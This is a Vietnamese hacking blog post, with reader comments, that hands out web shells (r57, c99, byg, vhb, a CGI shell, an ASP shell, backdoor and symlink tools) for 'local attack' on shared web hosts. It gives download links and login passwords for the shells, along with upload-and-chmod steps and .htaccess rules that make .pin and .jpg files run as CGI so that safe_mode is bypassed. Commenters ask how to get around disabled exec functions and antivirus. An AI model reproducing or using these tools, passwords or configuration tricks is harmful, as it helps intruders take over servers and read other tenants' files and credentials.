Nói đến local là nói đến shell, không có shell thì chỉ local
bằng niềm tin. Hôm nay soleil giới thiệu một số loại shell thông dụng không thể
thiếu trong local attack
Một số shell thông dụng:
r57.php
R57 hiện nay đang là shell thông dụng, được sử dụng phổ biến
nhất với hầu như là đầy đủ các tính năng.
c99.php
Nói đến r57 cũng không thể
không nhắc đến c99 với các thao tác có sẵn trên shell mà không cần phải
sử dụng lệnh: edit, del, insert, drop… đặc biệt là có khả năng dump cơ sở dữ liệu
byg.php
Byg hiện đang là shell mà được soleil sử dụng nhiều nhất với
các chức năng có sẵn và thao tác dễ sử dụng
pass login: byg
vhb.php
Con shell này đã được soleil Edit và Deveple bằng chính con shell Byg.php trên với 1 số tính năng mạnh hơn và giao diện đẹp, bắt mắt hơn. Đây là con shell chính mà soleil thường sử dụng nhất.
https://drive.google.com/file/d/0BxTrDVTYt0wwV2ZvTkxJQjNFZjQ/edit?usp=sharing
Pass login: vhb
soleil.pin https://drive.google.com/file/d/0BxTrDVTYt0wwRlljUWt5ZjhpX2s/edit?usp=sharing Nếu Server Safe_mod: ON, cả shell r57 và c99 đều không có chức năng run command để thực thi các câu lệnh, vậy làm sao có thể local được. Giải pháp được nghĩ đến là sử dụng shell cgi mà chức năng chính của nó là thực thi các câu lệnh.
Pass login: ducdung.08clc
Cách sử dụng:
-
Up shell soleil.pin và chmod nó về 755
-
Up hoặc tạo file .htaccess có nội dung:
## START ##Options +ExecCGIAddHandler cgi-script cgi pl cgi gmc pin jpgRewriteEngine onRewriteRule (.*)\.mil$ $1.cgiOptions +FollowSymLinksDirectoryIndex cmd.htmlOptions +IndexesRemoveHandler .hackAddType text/plain .hack## milw0rmvn exploit ##
Hoặc:
Options FollowSymLinks MultiViews Indexes ExecCGIAddType application/x-httpd-cgi .cinAddHandler cgi-script .pinAddHandler cgi-script .pin
-
telnet.php
Để sử dụng shell cgi được thuận tiên hơn, soleil giới thiệu
shell telnet.pl. Chức năng hoàn toàn tương tự với con shell soleil.pin
Tuy nhiên cách thức sử dụng nó thì đơn giản hơn nhiều vì
không phải sử dụng đến file .htaccess mà chỉ cần chmod nó về 755 là run ngon.
Soleil.asp
Dạng shell này dùng cho server win
Face symlink:
Get user:
Get user và domain
Shell này cần chmod về 755 trước khi sử dụng
Get all config
SSI
Backdoor.php
Netcut
zipcode.php
r57bypass.php (vip)
Check Shell : Kiểm tra shell có trên site
https://drive.google.com/file/d/0BwSvmW5i-fh-THhMLVRxMGlKUUk/edit?usp=sharing
https://drive.google.com/file/d/0BwSvmW5i-fh-ZURWeFg0TWdCckE/edit?usp=sharing
https://drive.google.com/file/d/0BwSvmW5i-fh-ZURWeFg0TWdCckE/edit?usp=sharing
Priv8_2012.php
saoluu.php
Shell xml: Up shell đối với vbulletin
root.tar.gz:
Dùng để sym root hay indirect sym
Soleil đã update lại bộ tool Shell đầy đủ và chọn lọc cho anh em ở đây:
https://drive.google.com/folderview?id=0BwSvmW5i-fh-cWZidW0yd2dMelE&usp=sharing
11 nhận xét:
Anh ơi pass unlock link mediafire là gì thế anh?
À anh up nốt link con soleil.pin đi anh, em thấy thiếu con link con soleil.pin anh ạ :)
anh cho em xin yahoo không ạh.
hâm mộ anh quá :D
Anh ơi. anh có thể zip cac file này rồi set pass hoặc encode được không anh.. Hic, Kis nó thịt không nương tay..
Cảm ơn anh vì sự chia sẽ rất hữu ích này :D
( em sẽ tải trong máy ảo)
Hi vọng sẽ mau có [Bài 3] ^_^
Bạn ơi ! nếu server mà disable functions : dl,exec,passthru,shell_exec,system,proc_open,popen .
Thì làm sao để chạy được shell vậy. Hoặc có cách nào giải quyết ko?
link die hết rùi anh ơi
link die hết rùi anh ơi
làm sao hiện len mấy bang dó thế ..ai chi mình ko...yahoo e la sb.yuyu@yahoo.com ai bit chiem hoc cai...
anh soleil vl nhể
Có thẻ up lại dùm không anh ơi? Link die hết rồi ạ. inbox face em nếu được nhá!
Soleil đã update lại toàn bộ các link die rồi nhé. Ae có thể download về và trải nghiệm :)
Đăng nhận xét